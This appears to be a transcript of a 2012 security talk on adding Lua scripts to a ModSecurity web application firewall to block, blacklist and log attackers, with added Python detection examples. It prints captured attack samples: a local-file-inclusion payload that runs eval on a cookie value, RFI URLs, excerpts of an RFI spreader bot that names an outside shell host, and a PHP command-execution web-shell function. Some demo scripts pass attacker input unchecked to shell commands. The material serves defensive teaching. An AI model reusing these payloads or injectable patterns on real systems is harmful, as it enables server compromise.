Teaching your WAF new tricks
© 2012
Presented by: Robert Rowley
Security Researcher
rrowley@trustwave.com
Disclaimer: The scripts contained in these slides are not recommended for you to use in production. If you get fired, it's your own fault.
Harass me on twitter: @iamlei
Agenda
• Preamble
– Writing a normal rule
– Lua introduction
– Scripting with: exec, @inspectFile, SecRuleScript
• Counter Intelligence
– RFI hunting/gathering
– Malicious request intelligence collection
– That WordPress Incident
Why me?
Mod sec intro
• Write a rule
• Block, Log, Repeat
• Apache
• IIS, Nginx (Beta)
mod_sec variables
REQUEST_BODY
REQUEST_COOKIES
REQUEST_FILENAME
REQUEST_HEADERS
REQUEST_LINE
REQUEST_METHOD
REQUEST_URI
RESPONSE_BODY
RESPONSE_HEADERS
SCRIPT_FILENAME
SCRIPT_USERNAME
TIME
ARGS
ARGS_NAMES
AUTH_TYPE
ENV
FILES
FILES_NAMES
FILES_SIZES
QUERY_STRING
REMOTE_ADDR
REMOTE_HOST
REMOTE_PORT
REMOTE_USER
...AND BEYOND!
Normal WAF rule
Example: Hash Collision DoS (CVE-2011-4885)

http://yourwebsite.com/index.php?EzEzEzEzEzEzEzEz=&EzEzEzEzEzEzEzFY=&EzEzEzEzEzEzEzG8=&EzEzEzEzEzEzEzH%17=&EzEzEzEzEzEzFYEz=&EzEzEzEzEzEzFYFY=&EzEzEzEzEzEzFYG8=&EzEzEzEzEzEzFYH%17=&EzEzEzEzEzEzG8Ez=&EzEzEzEzEzEzG8FY=& ...

SecRule &ARGS "@gt 100" deny
SecRule &ARGS "@gt 1000" deny
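The `&ARGS "@gt N"` rule above simply counts request arguments (the slides move the threshold from 100 to 1000). The added example below, which is not from the slides or from ModSecurity, reproduces that count in Python and adds a second check that explains why the request is expensive: it hashes the parameter names with DJBX33A, the function PHP 5 used for its hash tables (the assumption behind CVE-2011-4885), and reports how many of them land in the same bucket. The request string is constructed from the ten names visible on the slide; the benign request is made up for contrast.

```python
from collections import Counter
from urllib.parse import parse_qsl, urlsplit

# Constructed from the parameter names shown on the slide (the slide's
# request is truncated, so only these ten names are used here).
SLIDE_REQUEST = (
    "http://yourwebsite.com/index.php?"
    "EzEzEzEzEzEzEzEz=&EzEzEzEzEzEzEzFY=&EzEzEzEzEzEzEzG8=&EzEzEzEzEzEzEzH%17=&"
    "EzEzEzEzEzEzFYEz=&EzEzEzEzEzEzFYFY=&EzEzEzEzEzEzFYG8=&EzEzEzEzEzEzFYH%17=&"
    "EzEzEzEzEzEzG8Ez=&EzEzEzEzEzEzG8FY="
)
# Constructed benign request for comparison.
BENIGN_REQUEST = "http://yourwebsite.com/index.php?page=home&lang=en&id=42"


def djbx33a(name):
    """DJBX33A (hash = hash * 33 + byte, seed 5381) as used by PHP 5 hash tables.

    Collisions between the slide's names hold at any word size, so the
    32-bit truncation here only keeps the numbers small."""
    h = 5381
    for byte in name.encode("latin-1"):
        h = (h * 33 + byte) & 0xFFFFFFFF
    return h


def arg_names(request_url):
    """Parameter names exactly as a PHP request parser would see them.

    keep_blank_values matters: every parameter on the slide has an empty value,
    and the default would silently drop them all."""
    query = urlsplit(request_url).query
    return [name for name, _ in parse_qsl(query, keep_blank_values=True)]


def count_rule_matches(request_url, threshold=1000):
    """Python equivalent of: SecRule &ARGS "@gt <threshold>" deny."""
    return len(arg_names(request_url)) > threshold


def collision_report(request_url):
    """How many parameters, how many distinct hashes, and the biggest bucket."""
    names = arg_names(request_url)
    buckets = Counter(djbx33a(n) for n in names)
    largest = max(buckets.values()) if buckets else 0
    return {"args": len(names), "distinct_hashes": len(buckets), "largest_bucket": largest}


def collision_rule_matches(request_url, min_args=8, min_share=0.9):
    """Fire when (almost) all parameter names share one hash bucket.

    Unlike the plain count this catches a collision payload long before it
    reaches 1000 parameters, while a normal form with many fields passes."""
    report = collision_report(request_url)
    if report["args"] < min_args:
        return False
    return report["largest_bucket"] / report["args"] >= min_share


if __name__ == "__main__":
    for url in (SLIDE_REQUEST, BENIGN_REQUEST):
        print(url[:60], collision_report(url),
              "count-rule:", count_rule_matches(url),
              "collision-rule:", collision_rule_matches(url))
```

All ten names on the slide hash to one value, so the slide's request shows `distinct_hashes: 1` while the plain argument count (10) stays far below either threshold; the count rule only fires once the attacker sends hundreds of such names, which is exactly the size the real payloads reach.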
Adding Scripts!
Which one is not like the others?
192.168.69.101 "GET /index.php?include=pages HTTP/1.1" 200 "Mozilla/5.0 (Windows; U; Windows NT 5.1 ..."
192.168.69.101 "GET /index.php?include=/proc/self/enrivon%00 HTTP/1.1" 200 "<?php eval($_COOKIE['e']); ?>"
192.168.69.101 "GET / HTTP/1.1" 200 "Mozilla/5.0 (compatible; Baiduspider/2.0; ..."
Another Normal Rule
Example:
SecRule REQUEST_HEADERS:User-Agent "@contains <?php" deny
Blocks:
192.168.69.101 "GET /index.php?include=/proc/self/enrivon%00 HTTP/1.1" 200 "<?php eval($_COOKIE['e']); ?>"

Not So Normal
Example:
SecRule REQUEST_HEADERS:User-Agent "@contains <?php" deny,exec:dirty_firewaller.lua
A little lua intro
• Object oriented (Everything is a table)
• Light and easy
• Available in other tools
– Nmap
– Wireshark
– WoW
EXEC
Example:
SecRule REQUEST_HEADERS:User-Agent "@contains <?php" deny,exec:dirty_firewaller.lua
--- dirty_firewaller.lua ---
function main()
    -- REMOTE_ADDR is the client address of the request that tripped the rule
    local bad_ip = m.getvar("REMOTE_ADDR")
    -- the address is interpolated straight into a shell command and is not
    -- validated first; this is the slide's "not for production" script
    os.execute("iptables -A INPUT -s " .. bad_ip .. " -j DROP")
end

EXEC
Example:
SecRule REQUEST_HEADERS:User-Agent "@contains <?php" deny,exec:htaccess_firewaller.lua
--- htaccess_firewaller.lua ---
function main()
    local bad_ip = m.getvar("REMOTE_ADDR")
    -- append a deny line so Apache itself refuses the address on later requests
    local fh = io.open("/path/to/.htaccess", "a+")
    fh:write("deny from " .. bad_ip .. "\n")
    fh:close()
end
Using @inspectFile
SecRule FILES_TMPNAMES "@inspectFile file_inspector.lua" deny

Example script (AV)
SecRule FILES_TMPNAMES "@inspectFile file_inspector.lua" deny
--- file_inspector.lua ---
function main(filename)
    -- filename is the temporary path of one uploaded file (from FILES_TMPNAMES)
    local fh = io.open(filename, "r")
    if not fh then
        return nil
    end
    -- Lua has no assignment-as-expression, so read the file with fh:lines()
    for line in fh:lines() do
        if string.match(line, 'MALICIOUS') then
            fh:close()
            -- any non-nil return counts as a match, so the deny action fires
            return "MALICIOUS marker found in upload"
        end
    end
    fh:close()
    -- nil means no match: the upload is allowed through
    return nil
end

SpiderLabs making it awesome
• Implemented their own AV detection using ClamAV
• It's in the spiderlabs github
• https://github.com/SpiderLabs/owasp-modsecurity-crs/blob/master/util/runav.pl
Matching With Scripts
SecRuleScript "check_blacklist.lua" deny
--- check_blacklist.lua ---
function main()
    local ip = m.getvar('REMOTE_ADDR')
    -- blacklist.txt holds one entry per line; each line is used as a Lua
    -- pattern, so an unescaped '.' in it matches any character
    for line in io.lines("blacklist.txt") do
        if string.match(ip, line) then
            -- non-nil return = match, so the deny action fires
            return "client " .. ip .. " is blacklisted"
        end
    end
    return nil
end

Matching With Scripts
SecRule REQUEST_URI "admin" deny,chain
SecRuleScript "check_blacklist.lua"
(same check_blacklist.lua as above; the chained script only runs when the URI matched)

SpiderLabs making it awesome #2
"ipMatchFromFile" implemented in release 2.7
SecRule REQUEST_URI "admin" deny,chain
SecRule REMOTE_ADDR "@ipMatchFromFile blacklist.txt"

Counter Intelligence
RFI Hunting
192.168.69.101 - - [08/Oct/2012:11:19:27 -0700] "GET /thumb.php?src=http://site.com/shell.txt HTTP/1.1" 200 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
Trivial to pull from logs

RFI Hunting
192.168.69.101 - - [08/Oct/2012:11:12:43 -0700] "POST /thumb.php HTTP/1.1" 200 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
Problem … with a POST the argument travels in the request body, which the access log does not record.
rfi_logger.lua
SecRule ARGS "^http://" allow,exec:rfi_logger.lua
--- rfi_logger.lua ---
function main()
    local ip = m.getvar("REMOTE_ADDR")
    local url = m.getvar("REQUEST_URI")
    -- m.getvars returns a table of {name=..., value=...} for every ARGS entry,
    -- GET and POST alike, which is what the access log could not show
    local args = m.getvars("ARGS")
    for j = 1, #args do
        if string.match(args[j].value, 'http') then
            local fh = io.open("/tmp/backdoor", "a")
            fh:write("---" .. ip .. " " .. url .. " " .. args[j].name .. "=" .. args[j].value .. "---\n")
            fh:close()
            -- fetch a copy of the remote file for analysis; the URL is attacker
            -- supplied and goes straight to the shell (again, not for production)
            os.execute("wget -q -x -P /tmp/rfi_files/ '" .. args[j].value .. "'")
        end
    end
end
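The two "RFI Hunting" slides and rfi_logger.lua make one point: a remote URL in a GET query is easy to pull from the access log, but the same URL in a POST body is only visible from inside the WAF, where ARGS covers both. The added example below (mine, not the author's code) shows both sides in Python: a combined-log parser that extracts remote-URL arguments from GET lines, and the argument-level check that rfi_logger.lua performs on whatever `m.getvars("ARGS")` hands it. The log lines are constructed to mirror the slides; the fetch of the remote file is deliberately left out, so the script runs offline.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed access-log lines in Apache combined format, modelled on the slides.
ACCESS_LOG = [
    '192.168.69.101 - - [08/Oct/2012:11:19:27 -0700] "GET /thumb.php?src=http://site.com/shell.txt HTTP/1.1" 200 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"',
    '192.168.69.101 - - [08/Oct/2012:11:12:43 -0700] "POST /thumb.php HTTP/1.1" 200 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"',
    '10.0.0.7 - - [08/Oct/2012:11:20:01 -0700] "GET /index.php?include=pages HTTP/1.1" 200 "-" "Mozilla/5.0"',
    '10.0.0.8 - - [08/Oct/2012:11:21:09 -0700] "GET /thumb.php?src=http%3A%2F%2Fevil.example%2Fc.txt%3F HTTP/1.1" 200 "-" "curl/7.29"',
]

# ip, identd, user, [timestamp], "METHOD target protocol", status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Same idea as the slide's SecRule ARGS "^http://", widened to https/ftp and any case.
REMOTE_URL_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)


def rfi_candidates_from_args(ip, uri, args):
    """WAF-side check: args is a list of (name, value) pairs, the shape
    ModSecurity's m.getvars("ARGS") returns, so POST arguments are included."""
    return [
        {"ip": ip, "uri": uri, "name": name, "value": value}
        for name, value in args
        if REMOTE_URL_RE.match(value)
    ]


def rfi_candidates_from_log(lines):
    """Log-side check: only the query string of GET requests is available here."""
    found = []
    for line in lines:
        match = LOG_RE.match(line)
        if not match:
            continue  # not a combined-format line; skip rather than guess
        target = match.group("target")
        # parse_qsl percent-decodes, so an encoded http%3A%2F%2F is still caught
        args = parse_qsl(urlsplit(target).query, keep_blank_values=True)
        found.extend(rfi_candidates_from_args(match.group("ip"), target, args))
    return found


def hosts_to_review(candidates):
    """Distinct hosts that served the payloads, for the analyst's follow-up."""
    return sorted({urlsplit(c["value"]).hostname for c in candidates})


if __name__ == "__main__":
    candidates = rfi_candidates_from_log(ACCESS_LOG)
    for c in candidates:
        print(c["ip"], c["uri"], c["name"], "=", c["value"])
    print("hosts:", hosts_to_review(candidates))
```

Run against the constructed log, the GET lines yield two candidates and the POST line yields none, which is the "Problem …" slide; feeding the same POST request's arguments to `rfi_candidates_from_args`, as the WAF hook would, recovers it.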
<?php
###[ SEMBON CrEw SPREAD for RFIBot (2.3) ]###
error_reporting(0);
##### CONFIG #####
$mode = $_GET["mode"];
$url = 'http://www.web-faq.jp/click_counter/data/.data/'; //URL path
$src = $url.'cmd'; //Source Shell
$shell = '404.php'; //Backdoor PHPShell name
$bot = $url.'bot'; //Source PHPBot
##### SPREAD #####
...
die(base64_decode('TWNOIFNoZWxsOiA=').''.$exec.' Failed!'); //encode so it is more optimal!
}
...
It works

<html><head><title>/// Response CMD ///</title></head><body bgcolor=DC143C>
<H1>Changing this CMD will result in corrupt scanning !</H1>
</html></head></body>
<?php
...
function ex($cfe){
    $res = '';
    if (!empty($cfe)){
        if(function_exists('exec')){
            @exec($cfe,$res);
            $res = join("\n",$res);
        }
        elseif(function_exists('shell_exec')){
            $res = @shell_exec($cfe);
        }
...
It works
Better than a blacklist
[Diagram: Malicious Request → WAF script → 1) Capture Request, 2) Log IP]

Better than a blacklist
[Diagram: Request (from Unknown Host or Malicious Host) → WAF script → 1) Capture Request, 2) Log All Data → Unobstructed Response]
Put it together
SecRule REQUEST_HEADERS:User-Agent "@contains <?php" deny,status:200,exec:blacklist_ip.lua
SecRule REMOTE_ADDR "@ipMatchFromFile blacklist.txt" deny,status:200,exec:uber_logger.lua

Put it together
# deny with status:200 answers the blocked client with a 200 instead of a 403
SecRule REQUEST_HEADERS:User-Agent "@contains <?php" deny,status:200,exec:blacklist_ip.lua
--- blacklist_ip.lua ---
function main()
    local ip = m.getvar("REMOTE_ADDR")
    -- append the offending client to the list that @ipMatchFromFile reads
    local fh = io.open("blacklist.txt", "a")
    fh:write(ip .. "\n")
    fh:close()
end

Put it together
SecRule REMOTE_ADDR "@ipMatchFromFile blacklist.txt" deny,status:200,exec:uber_logger.lua
--- uber_logger.lua ---
function main()
    local ip = m.getvar("REMOTE_ADDR")
    local url = m.getvar("REQUEST_URI")
    local args = m.getvars("ARGS")
    local headers = m.getvars("REQUEST_HEADERS")
    local logstring = ""
    -- record every header and every argument of the blacklisted client's request
    for j = 1, #headers do
        logstring = logstring .. " " .. headers[j].name .. "=" .. headers[j].value
    end
    for j = 1, #args do
        logstring = logstring .. " " .. args[j].name .. "=" .. args[j].value
    end
    local fh = io.open("/tmp/uberlog", "a+")
    fh:write(ip .. " " .. url .. logstring .. "\n")
    fh:close()
end
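The two-rule set above is easiest to understand as a small state machine: the first hit from a client with `<?php` in its User-Agent is denied (with a 200) and the address is added to the list; every later request from that address, whatever it looks like, is denied the same way and dumped in full. The added example below is a Python simulation of that flow, written for this page and not taken from the slides or from ModSecurity. It keeps the blacklist in memory instead of in blacklist.txt, matches addresses with the `ipaddress` module so that CIDR entries work the way `@ipMatchFromFile` accepts them, and builds uberlog lines in the slide's format. One caveat the simulation deliberately does not reproduce: ModSecurity 2.x reads `@ipMatchFromFile` lists when the configuration is loaded, so an address appended by blacklist_ip.lua only takes effect after a reload, whereas the code below re-checks the list on every request. The sample requests are constructed.

```python
import ipaddress
from dataclasses import dataclass, field


@dataclass
class Request:
    remote_addr: str
    uri: str
    headers: list  # (name, value) pairs, like m.getvars("REQUEST_HEADERS")
    args: list     # (name, value) pairs, like m.getvars("ARGS")


@dataclass
class Waf:
    # Entries are plain addresses or CIDR blocks, as @ipMatchFromFile accepts.
    blacklist: list = field(default_factory=list)
    uberlog: list = field(default_factory=list)

    def ip_match(self, ip):
        """Stand-in for @ipMatchFromFile: exact or CIDR match."""
        addr = ipaddress.ip_address(ip)
        return any(addr in ipaddress.ip_network(entry, strict=False)
                   for entry in self.blacklist)

    def blacklist_ip(self, req):
        """What blacklist_ip.lua does: record the client address."""
        if req.remote_addr not in self.blacklist:
            self.blacklist.append(req.remote_addr)

    def uber_log(self, req):
        """What uber_logger.lua does: one line with every header and argument."""
        parts = [f"REQUEST_HEADERS:{n}={v}" for n, v in req.headers]
        parts += [f"ARGS:{n}={v}" for n, v in req.args]
        self.uberlog.append(" ".join([req.remote_addr, req.uri] + parts))

    def handle(self, req):
        """Run the two rules in the slide's order.

        Returns ("deny", 200) when a rule fires (status:200 means the client is
        not shown a 403) and ("pass", None) when the request goes to the app."""
        user_agent = dict(req.headers).get("User-Agent", "")
        # SecRule REQUEST_HEADERS:User-Agent "@contains <?php" deny,status:200,exec:blacklist_ip.lua
        if "<?php" in user_agent:
            self.blacklist_ip(req)
            return ("deny", 200)
        # SecRule REMOTE_ADDR "@ipMatchFromFile blacklist.txt" deny,status:200,exec:uber_logger.lua
        if self.ip_match(req.remote_addr):
            self.uber_log(req)
            return ("deny", 200)
        return ("pass", None)


def demo():
    """Constructed traffic: a tripwire hit, a follow-up from the same client,
    a client inside a pre-listed CIDR block, and a benign visitor."""
    waf = Waf(blacklist=["10.9.0.0/16"])
    results = []
    results.append(waf.handle(Request(
        "192.168.69.101", "/index.php?include=/proc/self/enrivon%00",
        [("User-Agent", "<?php eval($_COOKIE['e']); ?>"), ("Host", "www.example.test")],
        [("include", "/proc/self/enrivon")])))
    results.append(waf.handle(Request(
        "192.168.69.101", "/index.php?arg=<script>alert(1);</script>",
        [("User-Agent", "Mozilla/5.0 (compatible; Nmap Scripting Engine; http://nmap.org/book/nse.html)"),
         ("Connection", "Close"), ("Host", "www.example.test:80")],
        [("arg", "<script>alert(1);</script>")])))
    results.append(waf.handle(Request("10.9.4.4", "/", [("User-Agent", "curl/7.29")], [])))
    results.append(waf.handle(Request("203.0.113.5", "/", [("User-Agent", "Mozilla/5.0")], [])))
    return waf, results


if __name__ == "__main__":
    waf, results = demo()
    print(results)
    print("blacklist:", waf.blacklist)
    for line in waf.uberlog:
        print(line)
```

In the demo the first request only lands the address on the list (nothing is logged yet, because the deny stops rule processing), the second request from the same address is captured in full, the client inside the listed CIDR block is captured without ever having sent the tripwire User-Agent, and the benign visitor passes.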
Put it together
Uberlog data
69.110.217.76 /index.php?arg=<script>alert(1);</script> REQUEST_HEADERS:User-Agent=Mozilla/5.0 (compatible; Nmap Scripting Engine; http://nmap.org/book/nse.html) REQUEST_HEADERS:Connection=Close REQUEST_HEADERS:Host=69.110.217.76:80 ARGS:arg=<script>alert(1);</script>
69.110.217.76 /index.php?-s REQUEST_HEADERS:User-Agent=Mozilla/5.0 (compatible; Nmap Scripting Engine; http://nmap.org/book/nse.html) REQUEST_HEADERS:Connection=Close REQUEST_HEADERS:Host=69.110.217.76:80 ARGS:-s=
Data Mining
Capture only on malicious requests
Log far more data
– REQUEST_HEADERS
– POST variables
– COOKIE data
– FILES uploaded in the request
– GeoIP information
– Live data on the attack
– Make pretty* graphs
* OK they are not that pretty

Graphs!
[Three slides of graphs; the images are not part of the transcript.]
The WordPress Incident
(Monitoring Brute Force Attacks)
"Massive" WordPress attack in early April 2013.
Reported by several hosting providers as the reason for outages.
A Mr. Brian K. blogged that it was a botnet recruiting run.
Coincidentally: I had been monitoring wp-login.php requests with full data for months.
The WordPress Incident
(Why was I logging?)
Someone* complained on twitter**
Their logs looked like this:
POST wp-login.php
POST wp-login.php
POST wp-login.php
POST wp-login.php
POST wp-login.php
They wanted to know more.
* it was @Viss
** First time ever that complaining on twitter was beneficial, but not to the complainer.

The WordPress Incident
(Script I re-used)
I decided to put the "uber_logger.lua" script to work.
SecRule REQUEST_URI "wp-login.php" allow,exec:uber_logger.lua
x.x.x.236 /wp-login.php ARGS:log=admin ARGS:pwd=1admin
x.x.x.236 /wp-login.php ARGS:log=admin ARGS:pwd=admins
x.x.x.236 /wp-login.php ARGS:log=admin ARGS:pwd=webmaster
x.x.x.236 /wp-login.php ARGS:log=admin ARGS:pwd=password
x.x.x.236 /wp-login.php ARGS:log=admin ARGS:pwd=111111
x.x.x.236 /wp-login.php ARGS:log=admin ARGS:pwd=naruto
The WordPress Incident
(Data I got)
Password list of the brute force
Frequency of attacks against sites I controlled
Passwords: naruto, pokemon, 123456, admin, Sitename123, etc...
Correlated with the data from other researchers
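The "Data I got" slide lists what falls out of the wp-login.php uberlog once it is mined: the wordlist, the attempt frequency, and the material to correlate with other researchers. The added example below (mine, not the author's; the slides contain no analysis code) parses lines in the uberlog format shown on the previous slide and derives those three things: the most-tried passwords, attempts per source address, and passwords that several different addresses tried, which is the signature of one wordlist being worked by many hosts. The sample lines are constructed, with addresses anonymised the way the slide does. Because uber_logger.lua separates fields with spaces and does not escape values, the parser stops a password at the first whitespace; that is a limitation of the log format, not of the analysis.

```python
import re
from collections import Counter, defaultdict

# Constructed sample in the slide's uberlog format (the slide shows the first six lines' shape).
UBERLOG = """\
x.x.x.236 /wp-login.php ARGS:log=admin ARGS:pwd=1admin
x.x.x.236 /wp-login.php ARGS:log=admin ARGS:pwd=admins
x.x.x.236 /wp-login.php ARGS:log=admin ARGS:pwd=webmaster
x.x.x.236 /wp-login.php ARGS:log=admin ARGS:pwd=password
x.x.x.236 /wp-login.php ARGS:log=admin ARGS:pwd=111111
x.x.x.236 /wp-login.php ARGS:log=admin ARGS:pwd=naruto
x.x.x.17 /wp-login.php ARGS:log=admin ARGS:pwd=naruto
x.x.x.17 /wp-login.php ARGS:log=admin ARGS:pwd=pokemon
x.x.x.88 /wp-login.php ARGS:log=admin ARGS:pwd=123456
x.x.x.88 /wp-login.php ARGS:log=admin ARGS:pwd=naruto
x.x.x.9 /wp-login.php ARGS:log=alice ARGS:pwd=correct-horse
203.0.113.7 /index.php ARGS:s=hello
"""

# "<ip> <uri> ..." where the uri is the login endpoint; everything else is ignored.
LINE_RE = re.compile(r'^(?P<ip>\S+) (?P<uri>\S*wp-login\.php\S*)(?P<rest>.*)$')
# Each logged argument appears as ARGS:<name>=<value>; values end at whitespace.
ARG_RE = re.compile(r'ARGS:(?P<name>[^=\s]+)=(?P<value>\S*)')


def parse_uberlog(text):
    """One record per wp-login.php line: source address, username tried, password tried."""
    records = []
    for line in text.splitlines():
        match = LINE_RE.match(line)
        if not match:
            continue  # not a login request, or a line the format cannot express
        args = dict(ARG_RE.findall(match.group("rest")))
        records.append({
            "ip": match.group("ip"),
            "user": args.get("log", ""),   # WordPress's login field is named "log"
            "pwd": args.get("pwd", ""),
        })
    return records


def password_frequency(records, top=5):
    """The wordlist, most-tried first: what the slide calls the password list."""
    return Counter(r["pwd"] for r in records).most_common(top)


def attempts_per_ip(records):
    """Attack frequency per source address."""
    return Counter(r["ip"] for r in records)


def brute_force_sources(records, min_attempts=3):
    """Addresses that crossed a simple attempt threshold."""
    return sorted(ip for ip, n in attempts_per_ip(records).items() if n >= min_attempts)


def shared_passwords(records, min_ips=2):
    """Passwords tried from several distinct addresses: evidence that the
    same wordlist is being worked by many hosts, which is what one would
    correlate with other researchers' data."""
    ips_by_pwd = defaultdict(set)
    for r in records:
        ips_by_pwd[r["pwd"]].add(r["ip"])
    return sorted(p for p, ips in ips_by_pwd.items() if len(ips) >= min_ips)


if __name__ == "__main__":
    recs = parse_uberlog(UBERLOG)
    print("passwords:", password_frequency(recs))
    print("per ip:", attempts_per_ip(recs))
    print("brute-force sources:", brute_force_sources(recs))
    print("shared passwords:", shared_passwords(recs))
```

On the constructed sample "naruto" tops the list because three different addresses tried it, x.x.x.236 is the only source over the three-attempt threshold, and the unrelated /index.php line is skipped rather than miscounted.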
The WordPress Incident
(My Perspective)
● It was a brute force, but a lame one.
● It got press because hosts were going down.
● Evidence that WP auth mechanisms can cause DoS.
● WordPress is a buzzword for security press.
● Read my article all about WP auth on blog.spiderlabs.com :).
Bibliography/Questions?
• http://www.modsecurity.org
• http://www.lua.org
• http://blog.spiderlabs.com
• SpiderLabs github: https://github.com/SpiderLabs
• You seriously want my code? https://github.com/rawrly/ModSecScripts
Take your pitchfork to me on twitter: @iamlei

Kari Kakkonen
 

Recently uploaded (20)

20240607 QFM018 Elixir Reading List May 2024
20240607 QFM018 Elixir Reading List May 202420240607 QFM018 Elixir Reading List May 2024
20240607 QFM018 Elixir Reading List May 2024
 
zkStudyClub - Reef: Fast Succinct Non-Interactive Zero-Knowledge Regex Proofs
zkStudyClub - Reef: Fast Succinct Non-Interactive Zero-Knowledge Regex ProofszkStudyClub - Reef: Fast Succinct Non-Interactive Zero-Knowledge Regex Proofs
zkStudyClub - Reef: Fast Succinct Non-Interactive Zero-Knowledge Regex Proofs
 
GraphRAG is All You need? LLM & Knowledge Graph
GraphRAG is All You need? LLM & Knowledge GraphGraphRAG is All You need? LLM & Knowledge Graph
GraphRAG is All You need? LLM & Knowledge Graph
 
GraphSummit Singapore | Neo4j Product Vision & Roadmap - Q2 2024
GraphSummit Singapore | Neo4j Product Vision & Roadmap - Q2 2024GraphSummit Singapore | Neo4j Product Vision & Roadmap - Q2 2024
GraphSummit Singapore | Neo4j Product Vision & Roadmap - Q2 2024
 
20240609 QFM020 Irresponsible AI Reading List May 2024
20240609 QFM020 Irresponsible AI Reading List May 202420240609 QFM020 Irresponsible AI Reading List May 2024
20240609 QFM020 Irresponsible AI Reading List May 2024
 
Free Complete Python - A step towards Data Science
Free Complete Python - A step towards Data ScienceFree Complete Python - A step towards Data Science
Free Complete Python - A step towards Data Science
 
DevOps and Testing slides at DASA Connect
DevOps and Testing slides at DASA ConnectDevOps and Testing slides at DASA Connect
DevOps and Testing slides at DASA Connect
 
Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...
Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...
Why You Should Replace Windows 11 with Nitrux Linux 3.5.0 for enhanced perfor...
 
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024Encryption in Microsoft 365 - ExpertsLive Netherlands 2024
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024
 
Securing your Kubernetes cluster_ a step-by-step guide to success !
Securing your Kubernetes cluster_ a step-by-step guide to success !Securing your Kubernetes cluster_ a step-by-step guide to success !
Securing your Kubernetes cluster_ a step-by-step guide to success !
 
By Design, not by Accident - Agile Venture Bolzano 2024
By Design, not by Accident - Agile Venture Bolzano 2024By Design, not by Accident - Agile Venture Bolzano 2024
By Design, not by Accident - Agile Venture Bolzano 2024
 
Secstrike : Reverse Engineering & Pwnable tools for CTF.pptx
Secstrike : Reverse Engineering & Pwnable tools for CTF.pptxSecstrike : Reverse Engineering & Pwnable tools for CTF.pptx
Secstrike : Reverse Engineering & Pwnable tools for CTF.pptx
 
Artificial Intelligence for XMLDevelopment
Artificial Intelligence for XMLDevelopmentArtificial Intelligence for XMLDevelopment
Artificial Intelligence for XMLDevelopment
 
Uni Systems Copilot event_05062024_C.Vlachos.pdf
Uni Systems Copilot event_05062024_C.Vlachos.pdfUni Systems Copilot event_05062024_C.Vlachos.pdf
Uni Systems Copilot event_05062024_C.Vlachos.pdf
 
Mind map of terminologies used in context of Generative AI
Mind map of terminologies used in context of Generative AIMind map of terminologies used in context of Generative AI
Mind map of terminologies used in context of Generative AI
 
A tale of scale & speed: How the US Navy is enabling software delivery from l...
A tale of scale & speed: How the US Navy is enabling software delivery from l...A tale of scale & speed: How the US Navy is enabling software delivery from l...
A tale of scale & speed: How the US Navy is enabling software delivery from l...
 
Enchancing adoption of Open Source Libraries. A case study on Albumentations.AI
Enchancing adoption of Open Source Libraries. A case study on Albumentations.AIEnchancing adoption of Open Source Libraries. A case study on Albumentations.AI
Enchancing adoption of Open Source Libraries. A case study on Albumentations.AI
 
Essentials of Automations: The Art of Triggers and Actions in FME
Essentials of Automations: The Art of Triggers and Actions in FMEEssentials of Automations: The Art of Triggers and Actions in FME
Essentials of Automations: The Art of Triggers and Actions in FME
 
Elizabeth Buie - Older adults: Are we really designing for our future selves?
Elizabeth Buie - Older adults: Are we really designing for our future selves?Elizabeth Buie - Older adults: Are we really designing for our future selves?
Elizabeth Buie - Older adults: Are we really designing for our future selves?
 
Climate Impact of Software Testing at Nordic Testing Days
Climate Impact of Software Testing at Nordic Testing DaysClimate Impact of Software Testing at Nordic Testing Days
Climate Impact of Software Testing at Nordic Testing Days
 

Teaching Your WAF New Tricks

  • 11. © 2012 Which one is not like the others?
    192.168.69.101 "GET /index.php?include=pages HTTP/1.1" 200 "Mozilla/5.0 (Windows; U; Windows NT 5.1 ...)"
    192.168.69.101 "GET /index.php?include=/proc/self/environ%00 HTTP/1.1" 200 "<?php eval($_COOKIE['e']); ?>"
    192.168.69.101 "GET / HTTP/1.1" 200 "Mozilla/5.0 (compatible; Baiduspider/2.0; ...)"
  • 13. Another Normal Rule
    Example:
      SecRule REQUEST_HEADERS:User-Agent "<?php" deny
    Blocks:
      192.168.69.101 "GET /index.php?include=/proc/self/environ%00 HTTP/1.1" 200 "<?php eval($_COOKIE['e']); ?>"
    The collection is REQUEST_HEADERS (there is no REQUEST_HEADER variable). The request above is a local file inclusion of /proc/self/environ: the User-Agent string lands in that file, so the attacker ships the PHP payload in the header and lets the include execute it.
  • 15. Not So Normal
    Example:
      SecRule REQUEST_HEADERS:User-Agent "<?php" deny,exec:dirty_firewaller.lua
    exec is a non-disruptive action: the request is still denied, and the script runs as well.
  • 16. A little lua intro
    - Object-oriented style via tables and metatables (everything is a table)
    - Light and easy to embed
    - Available in other tools: Nmap (NSE), Wireshark, World of Warcraft
  • 17. EXEC
    Example:
      SecRule REQUEST_HEADERS:User-Agent "<?php" deny,exec:dirty_firewaller.lua

      --- dirty_firewaller.lua ---
      -- For a .lua parameter, exec calls the script's main() inside ModSecurity
      function main()
        local bad_ip = m.getvar("REMOTE_ADDR")   -- the variable name is passed as a string
        os.execute("iptables -A INPUT -s " .. bad_ip .. " -j DROP")
      end

    Caveats: the script runs as the web server user, which normally cannot call iptables without sudo or a setuid helper; every matching request appends one more identical rule; and behind a reverse proxy REMOTE_ADDR is the proxy, so you would firewall yourself. Hence "dirty".
  • 20. EXEC
    Example:
      SecRule REQUEST_HEADERS:User-Agent "<?php" deny,exec:htaccess_firewaller.lua

      --- htaccess_firewaller.lua ---
      function main()
        local bad_ip = m.getvar("REMOTE_ADDR")
        local fh = io.open("/path/to/.htaccess", "a")   -- the mode is a string; append
        if fh then
          fh:write("deny from " .. bad_ip .. "\n")     -- newline, or the next entry runs into this one
          fh:close()
        end
      end

